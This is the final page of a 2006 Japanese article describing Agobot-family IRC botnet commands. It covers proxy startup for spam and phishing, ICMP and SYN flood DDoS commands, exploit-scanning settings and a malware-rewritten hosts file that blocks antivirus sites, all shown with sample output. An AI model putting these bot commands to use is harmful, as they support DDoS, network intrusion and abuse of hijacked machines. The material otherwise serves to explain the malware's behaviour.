2006年 3月 25日(土曜日) 00:04 | 
Posted by TTS| Articles - Malware |
page 3/3
プロキシサーバの起動
Agobot系でもプロキシサーバの起動はコマンド一発で行える。Socksプロキシ、HTTP/HTTPSプロキシサーバ、TCPポートリダイレクトなどのコマンドが用意されている。
■図29:スパムやフィッシングメールに利用できるSocksプロキシサーバやHTTPプロキシサーバもコマンド一発で起動する。
.redirect.http 32112 ←HTTPプロキシサーバ起動
redirhttp: starting proxy on port 32112.
.redirect.https 32113 ←HTTPSプロキシサーバ起動
redirhttps: starting proxy on port 32113.
.redirect.socks 26000 ←Socksプロキシサーバ起動
redirsocks: starting proxy on port 26000.
.redirect.stop ←サーバストップ
DDoSアタック、スキャンなど
その他、DDoSアタックや脆弱性スキャンに関しても、rbot系と同じように行うことが可能だ。スキャンレンジも細かく設定できる。また、IRCチャンネル関連やボットのスピードテストコマンドなども用意されている。
■図30:DDoSアタック、脆弱性スキャンなど
・DDoSアタック
.ddos.phaticmp 192.168.1.20 60 5 ←ICMP Flood
phatICMP: flooding 192.168.1.20 for 60 seconds, 5 ms delay.
.ddos.phatsyn 192.168.1.20 60 5 0 ←SYN Flood
phatSYN: flooding 192.168.1.20 port 0 for 60 seconds, 5 ms delay.
・脆弱性スキャン
.scan.stats ←スキャン内容の確認
exploited stats: DCOM2(135): 0 DCOM(135): 0 DCOM(1025): 0 DCOM(445): 0 DW(6129): 0 Locator(445): 0 LSASS(445): 0 NetBios(139): 0 NetBios(445): 0 Optix(3410): 0 SASSER(5554): 0 SQL(1433): 0 UPNP(5000): 0 WebDav(80): 0 WKS(139): 0
.scan.listnetranges ←スキャンレンジの閲覧(追加や削除も可)
-[ netrange list ]-
1. mask: 192.168.1.0/24 prio: 80
2. mask: 192.168.0.0/16 prio: 90
3. mask: 192.0.0.0/8 prio: 100
.scan.enable DCOM ←使用するスキャン内容を設定
.scan.start ←スキャン開始
・ボットのスピードテスト
.http.speedtest
speed: EU(105 kbit/s) US(0 kbit/s) ASIA(1141 kbit/s) Total(415 kbit/s)・ボットの削除
.bot.remove
removing bot...
* g4uz9vf has quit IRC (Read error: Connection reset by peer)
・書き換えられたHostsファイル
127.0.0.1 localhost
127.0.0.1 www.symantec.com
127.0.0.1 securityresponse.symantec.com
127.0.0.1 symantec.com
127.0.0.1 www.sophos.com
127.0.0.1 sophos.com
127.0.0.1 www.mcafee.com
127.0.0.1 mcafee.com
127.0.0.1 liveupdate.symantecliveupdate.com
127.0.0.1 www.viruslist.com
127.0.0.1 viruslist.com
127.0.0.1 viruslist.com
127.0.0.1 f-secure.com
127.0.0.1 www.f-secure.com
127.0.0.1 kaspersky.com
127.0.0.1 www.avp.com
127.0.0.1 www.kaspersky.com
127.0.0.1 avp.com
127.0.0.1 www.networkassociates.com
127.0.0.1 networkassociates.com
127.0.0.1 www.ca.com
127.0.0.1 ca.com
127.0.0.1 mast.mcafee.com
127.0.0.1 my-etrust.com
127.0.0.1 www.my-etrust.com
127.0.0.1 download.mcafee.com
127.0.0.1 dispatch.mcafee.com
127.0.0.1 secure.nai.com
127.0.0.1 nai.com
127.0.0.1 www.nai.com
127.0.0.1 update.symantec.com
127.0.0.1 updates.symantec.com
127.0.0.1 us.mcafee.com
127.0.0.1 liveupdate.symantec.com
127.0.0.1 customer.symantec.com
127.0.0.1 rads.mcafee.com
127.0.0.1 trendmicro.com
127.0.0.1 www.trendmicro.com
関連記事
人気記事
- BIOSパスワードロックで安全性は保てない?
- Windows ログオンパスワードバイパス
- LulzSecがチャイルドポルノサイトのユーザー7千人のログイン・パスワードを公開
- agroindustri.menlh.go.id 他 Hacked by Cyb3rSec Crew | Malaysian Crew
- Metasploit Tutorial 2
- AnonymousがDDoSツール#RefRefのソースコードを公開
- www.rgd.gov.lk Hacked by TEAM T!g3R
- 複数サイト改ざん Cyb3rSec Crew | Malaysian Crew
- Metasploit Tutorial 1
- DDoS攻撃に使われる LOIC